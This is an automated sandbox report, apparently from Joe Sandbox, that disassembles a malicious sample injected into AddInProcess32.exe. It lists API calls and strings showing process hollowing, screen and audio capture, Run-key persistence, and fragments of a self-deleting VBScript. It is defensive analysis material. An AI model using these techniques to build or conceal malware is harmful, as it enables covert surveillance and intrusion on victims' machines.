                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                  • String ID:
                  • API String ID: 1084509184-0
                  • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                  • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                  • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                  • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                  Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                  Download Yara Rule
                  APIs
                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                  • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                  Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                  • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                    • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                  • DeleteDC.GDI32(00000000), ref: 00418F2A
                  • DeleteDC.GDI32(00000000), ref: 00418F2D
                  • DeleteObject.GDI32(00000000), ref: 00418F30
                  • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                  • DeleteDC.GDI32(00000000), ref: 00418F62
                  • DeleteDC.GDI32(00000000), ref: 00418F65
                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                  • GetIconInfo.USER32 ref: 00418FBD
                  • DeleteObject.GDI32(?), ref: 00418FEC
                  • DeleteObject.GDI32(?), ref: 00418FF9
                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                  • DeleteDC.GDI32(?), ref: 0041917C
                  • DeleteDC.GDI32(00000000), ref: 0041917F
                  • DeleteObject.GDI32(00000000), ref: 00419182
                  • GlobalFree.KERNEL32(?), ref: 0041918D
                  • DeleteObject.GDI32(00000000), ref: 00419241
                  • GlobalFree.KERNEL32(?), ref: 00419248
                  • DeleteDC.GDI32(?), ref: 00419258
                  • DeleteDC.GDI32(00000000), ref: 00419263
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                  • String ID: DISPLAY
                  • API String ID: 479521175-865373369
                  • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                  • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                  • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                  • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                  Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                  • GetProcAddress.KERNEL32(00000000), ref: 00418139
                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                  • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                  • GetProcAddress.KERNEL32(00000000), ref: 00418161
                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                  • GetProcAddress.KERNEL32(00000000), ref: 00418175
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                  • ResumeThread.KERNEL32(?), ref: 00418435
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                  • GetCurrentProcess.KERNEL32(?), ref: 00418457
                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                  • GetLastError.KERNEL32 ref: 0041847A
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                  • API String ID: 4188446516-3035715614
                  • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                  • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                  • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                  • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                  Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                  • ExitProcess.KERNEL32 ref: 0040D7D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                  • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                  • API String ID: 1861856835-332907002
                  • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                  • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                  • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                  • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                  Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                  • ExitProcess.KERNEL32 ref: 0040D419
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                  • API String ID: 3797177996-2557013105
                  • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                  • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                  • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                  • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                  Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                  • ExitProcess.KERNEL32(00000000), ref: 004124A0
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                  • CloseHandle.KERNEL32(00000000), ref: 0041253B
                  • GetCurrentProcessId.KERNEL32 ref: 00412541
                  • PathFileExistsW.SHLWAPI(?), ref: 00412572
                  • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                  • lstrcatW.KERNEL32 ref: 00412601
                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                  • Sleep.KERNEL32(000001F4), ref: 00412682
                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                  • CloseHandle.KERNEL32(00000000), ref: 004126A9
                  • GetCurrentProcessId.KERNEL32 ref: 004126AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                  • API String ID: 2649220323-436679193
                  • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                  • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                  • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                  • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                  Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                  • SetEvent.KERNEL32 ref: 0041B219
                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                  • CloseHandle.KERNEL32 ref: 0041B23A
                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                  • API String ID: 738084811-2094122233
                  • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                  • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                  • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                  • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                  Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Write$Create
                  • String ID: RIFF$WAVE$data$fmt
                  • API String ID: 1602526932-4212202414
                  • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                  • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                  • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                  • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                  Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                  • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                  • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                  • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                  • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                  • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                  • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                  • API String ID: 1646373207-4283035339
                  • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                  • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                  • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                  • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                  Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 0040CE07
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                  • CopyFileW.KERNEL32 ref: 0040CED0
                  • _wcslen.LIBCMT ref: 0040CEE6
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                  • CopyFileW.KERNEL32 ref: 0040CF84
                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                  • _wcslen.LIBCMT ref: 0040CFC6
                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                  • CloseHandle.KERNEL32 ref: 0040D02D
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                  • ExitProcess.KERNEL32 ref: 0040D062
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open
                  • API String ID: 1579085052-1506045317
                  • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                  • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                  • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                  • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                  Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?), ref: 0041C036
                  • _memcmp.LIBVCRUNTIME ref: 0041C04E
                  • lstrlenW.KERNEL32(?), ref: 0041C067
                  • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                  • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                  • _wcslen.LIBCMT ref: 0041C13B
                  • FindVolumeClose.KERNEL32 ref: 0041C15B
                  • GetLastError.KERNEL32 ref: 0041C173
                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                  • lstrcatW.KERNEL32 ref: 0041C1B9
                  • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                  • GetLastError.KERNEL32 ref: 0041C1D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                  • String ID: ?
                  • API String ID: 3941738427-1684325040
                  • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                  • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                  • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                  • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                  Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                  • LoadLibraryA.KERNEL32(?), ref: 00414E17
                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                  • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                  • LoadLibraryA.KERNEL32(?), ref: 00414E76
                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                  • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                  • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                  • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                  • API String ID: 2490988753-1941338355
                  • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                  • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                  • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                  • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                  Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                  • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                  • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                  • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                  • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                  • Sleep.KERNEL32(00000064), ref: 00412E94
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
